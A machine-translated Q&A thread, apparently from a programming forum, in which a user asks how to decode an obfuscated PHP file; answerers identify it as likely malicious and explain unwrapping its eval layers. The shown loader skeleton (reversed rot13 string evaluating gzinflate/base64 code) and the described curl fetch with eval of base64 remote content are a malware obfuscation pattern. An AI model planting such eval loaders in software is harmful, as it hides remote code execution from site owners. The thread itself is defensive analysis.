解码加密的PHP文件
我有一个文件,我正试图解码,但我不知道最好的方式去做它。我尝试过使用一些在线工具,但运气不好……代码如下所示:解码加密的PHP文件,php,decode,encryption,Php,Decode,Encryption,我有一个文件,我正试图解码,但我不知道最好的方式去做它。我尝试过使用一些在线工具,但运气不好……代码如下所示: <?php $zAkSoSavjFOn='jumbledcodeinhere'; $THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir'; $DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr); $WnJYuMUwKmRxBh=str_rot13
<?php
$zAkSoSavjFOn='jumbledcodeinhere';
$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';
$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);
$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);
eval($WnJYuMUwKmRxBh);
?>
在我所有的游戏中,我都设法用php脚本提取了以下内容:
eval(gzflate(base64_解码(strev($zAkSoSavjFOn)))代码>
有人能给我指出这个过程的正确方向吗?任何帮助都将不胜感激。:) 该“混乱代码”是gzip、base64编码的反向PHP代码,几乎肯定是恶意的
将eval
替换为echo
,看看它能给你带来什么,这就是试图运行的代码。我不确定这是不是真的加密了-它看起来更像是为了保护版权/知识产权而故意混淆的。如果您无法访问实际的源代码,则很可能您试图解码此代码而违反了法律将eval
替换为echo
返回eval(gzflate(base64_decode(strev($zAkSoSavjFOn)))代码>代码。啊,我是指那里面的eval
。试试这个:echogzflate(base64_解码(strev($zAkSoSavjFOn))代码>好的,我明白了。当我这样做时,它会返回以下内容,几乎与第一个块相似<代码>$dXWzuSHlsBFgCJhKbBgV='morejumbledcode'$PUjTLmBUZDuFRJ=';))Itooxuwptsofhyufhmjkq$(ireegf(rqbprq_46rfno)(rgnysavmt(ynir)$Fyfyfzgltraqcnrefsr=strrev($PUjTLmBUZDuFRJ);$JmCKTmVJADRViXHTZE=str_rot13($fyfyfyfzgltraqcnrefsr);eval($)
编写此代码的人将竭尽全力隐藏它。只要继续这样做,用echo
替换eval
,直到你得到一个看起来不一样的东西。嗯……有趣的是,它最终让我找到了一个易读的代码,但这都是关于打开/关闭卷曲的。最后一行是这样的:$_SESSION['awcvagcontent']=$content;}else{$content=$\u SESSION['awcvagcontent']}eval('?>'.base64_decode($content)。
在我的编辑器中,它告诉我php的最后一行有错误,如果我尝试回显最后一行中找到的eval,我只会得到一个“意外的T_ENCAPSED_和_空格”错误。对我来说,curl选项被隐藏似乎很奇怪……或者我仍然缺少代码的其他部分?